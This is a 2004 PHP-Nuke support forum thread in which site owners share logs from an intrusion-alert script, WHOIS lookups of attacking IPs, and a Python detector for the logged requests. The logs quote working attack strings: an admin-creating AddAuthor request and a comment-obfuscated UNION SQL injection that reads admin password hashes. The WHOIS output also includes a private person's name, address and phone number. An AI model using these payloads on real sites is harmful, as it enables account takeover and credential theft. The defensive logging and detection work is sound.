Ravens PHP Scripts: Forums

Hack Attempt Script
sharlein
Member Emeritus


Joined: Nov 19, 2002
Posts: 322
Location: On the Road

PostPosted: Wed Mar 31, 2004 9:58 am

Quote:
80.55.93.226

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer:

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail:



DOCUMENT_ROOT : public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80

SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1


_________________
Give Me Ambiguity Or Give Me Something Else! 
64bitguy
The Mouse Is Extension Of Arm


Joined: Mar 06, 2004
Posts: 1159
Location: Sanbornton, NH USA

PostPosted: Mon Apr 05, 2004 12:27 am

This one was busted by RavenScript tonight.

The Proxy reported by the Script was:
Quote:
80.80.128.163
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer:

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail:



HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987
SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME :
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php


A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:
Quote:

inetnum: 80.80.133.64 - 80.80.133.95
netname: ANGELSOFT-FORCE
descr: Force computer club IP addresses
country: BG
admin-c: STB1-RIPE
tech-c: AN767-RIPE
status: ASSIGNED PA
notify:
mnt-by: AS12829-MNT
changed: 20011101
source: RIPE

route: 80.80.132.0/22
descr: Angelsoft's clients aggregated route
origin: AS12829
notify:
notify:
mnt-by: AS12829-MNT
changed: 20020724
source: RIPE

role: Angelsoft NOC
address: 5 Kostaki Peev Str.
address: Plovdiv 4000
address: Bulgaria
phone: +359 32 635 211
fax-no: +359 32 638 209
e-mail:
e-mail:
trouble: visit
trouble: voice:
trouble: +359 32 635 211
trouble: +359 32 638 209
admin-c: AG5443-RIPE
tech-c: AY279-RIPE
nic-hdl: AN767-RIPE
remarks: This role object holds the handles of
remarks: supporting staff of AngelSoft ET
remarks: 5 Kostaki Peev Str.
remarks: Plovdiv
remarks: Bulgaria
notify:
mnt-by: AS12829-MNT
changed: 20010712
changed: 20020919
changed: 20030425
source: RIPE

person: Smilen Todorov Botev
address: 21 "Stoian Sredev"
address: Saedinenie
address: Plovdiv area
address: Bulgaria
phone: +359 88 964 794
e-mail:
nic-hdl: STB1-RIPE
notify:
notify:
changed: 20011101
source: RIPE

_________________
Steph Benoit
1CMS, 100% Section 508 and W3C XHTML/CSS Compliant (Truly)

Last edited by 64bitguy on Thu Apr 08, 2004 6:05 pm; edited 3 times in total 
64bitguy
PostPosted: Thu Apr 08, 2004 6:02 pm

Busted 217.219.75.92 / 216.148.246.70

Quote:
OrgName: CERFnet
OrgID: CERF
Address: 5738 Pacific Center Blvd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US

NetRange: 216.148.0.0 - 216.148.255.255
CIDR: 216.148.0.0/16
NetName: CERFNET-BLK-4
NetHandle: NET-216-148-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: DBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: CBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: DMTU.MT.NS.ELS-GMS.ATT.NET
NameServer: CMTU.MT.NS.ELS-GMS.ATT.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1998-12-03
Updated: 2000-03-09

TechHandle: CERF-HM-ARIN
TechName: AT&T Enhanced Network Services
TechPhone: +1-858-812-5000
TechEmail:

OrgTechHandle: NETWO10-ARIN
OrgTechName: Network Provisioning
OrgTechPhone: +1-800-876-2373
OrgTechEmail:



HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
 
HauntedWebby
Involved


Joined: May 19, 2004
Posts: 363
Location: Ogden, UT

PostPosted: Thu May 20, 2004 9:56 am

Raven caught one for me - May 19, 2004 10:19PM (MST)

Quote:
201.5.225.38




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer:

NetRange: 201.0.0.0 - 201.255.255.255
CIDR: 201.0.0.0/8
NetName: LACNIC-201
NetHandle: NET-201-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: NS2.DNS.BR
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
Comment: This IP address range is under LACNIC responsibility
Comment: for further allocations to users in LACNIC region.
Comment: Please see for further details,
Comment: or check the WHOIS server located at whois.lacnic.net
RegDate: 2003-04-03
Updated: 2004-03-18

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail:



PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1

 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Thu May 20, 2004 10:40 am

Cool
 
jamesmc
New Member


Joined: Dec 22, 2003
Posts: 21

PostPosted: Tue Jun 01, 2004 6:13 am

My site was hacked this weekend despite the script being in place and operational (tested as per Raven's Readme file). They must have found another way in. How, I don't know, as no report was generated and emailed.

Plastered all over the place was: ‘This Sait Hacked by Leroy Security Team’

Wouldn't be so bad if they could at least spell!!

Are there any other security enhancements that you guys can recommend?

regards
James Mc
 
Raven
PostPosted: Tue Jun 01, 2004 6:27 am

This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used.
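Raven's point is that the alert script only covers UNION-type requests such as the jokeid payload quoted above, not requests like the op=AddAuthor one in the first post. As an added example that is not part of this thread or of Raven's script, the Python detector below normalises the /**/ comment obfuscation seen in that payload, flags both request shapes, and keeps the X-Forwarded-For proxy chain for correlation; the sample records are constructed from the REQUEST_URI, REMOTE_ADDR and HTTP_X_FORWARDED_FOR lines posted in the thread, and the rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample records built from the REQUEST_URI, REMOTE_ADDR and
# HTTP_X_FORWARDED_FOR lines posted in this thread (the third is a benign control).
SAMPLE_REQUESTS = [
    {"remote_addr": "201.5.225.38", "xff": "",
     "uri": "/hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select"
            "/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*"},
    {"remote_addr": "80.55.93.226", "xff": "",
     "uri": "/Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God"
            "&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1"},
    {"remote_addr": "216.148.246.70", "xff": "217.219.75.92, 10.101.3.111",
     "uri": "/modules.php?name=News&file=article&sid=12"},
]

UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.DOTALL)

def normalise(query: str) -> str:
    """Decode, replace /*...*/ comments (the /**/ spacer of the jokeid payload) with spaces, lower-case."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.DOTALL)
    return re.sub(r"\s+", " ", text).strip().lower()

def classify(uri: str) -> list[str]:
    """Return the (assumed) rule names matched by one request URI; empty list if clean."""
    norm = normalise(uri.partition("?")[2])
    hits = []
    if UNION_RE.search(norm):
        hits.append("sql-union")      # UNION ... SELECT inside any parameter value
    params = dict(p.split("=", 1) for p in norm.split("&") if "=" in p)
    if params.get("op") == "addauthor" and params.get("add_radminsuper") == "1":
        hits.append("admin-add")      # direct request to create a super-admin author
    return hits

def client_chain(remote_addr: str, xff: str) -> list[str]:
    """X-Forwarded-For hops then the TCP peer; the header is client-supplied, so correlation only."""
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops + [remote_addr]

def scan(requests: list[dict]) -> list[dict]:
    """Report every request that matched at least one rule."""
    report = []
    for r in requests:
        if hits := classify(r["uri"]):
            report.append({"peer": r["remote_addr"], "rules": hits,
                           "chain": client_chain(r["remote_addr"], r["xff"])})
    return report
```

Running scan(SAMPLE_REQUESTS) reports the two hostile records and leaves the benign article request out.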
 
HauntedWebby
PostPosted: Tue Jun 01, 2004 9:47 am

I have all three (this script, Chatserv & Sentinel) and I went from being hacked once a week to not seeing anything.
 
jamesmc
PostPosted: Tue Jun 01, 2004 4:34 pm

Hi Raven

Thanks for the input. Much appreciated.

Keep up the good work..

regards
James Mc
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours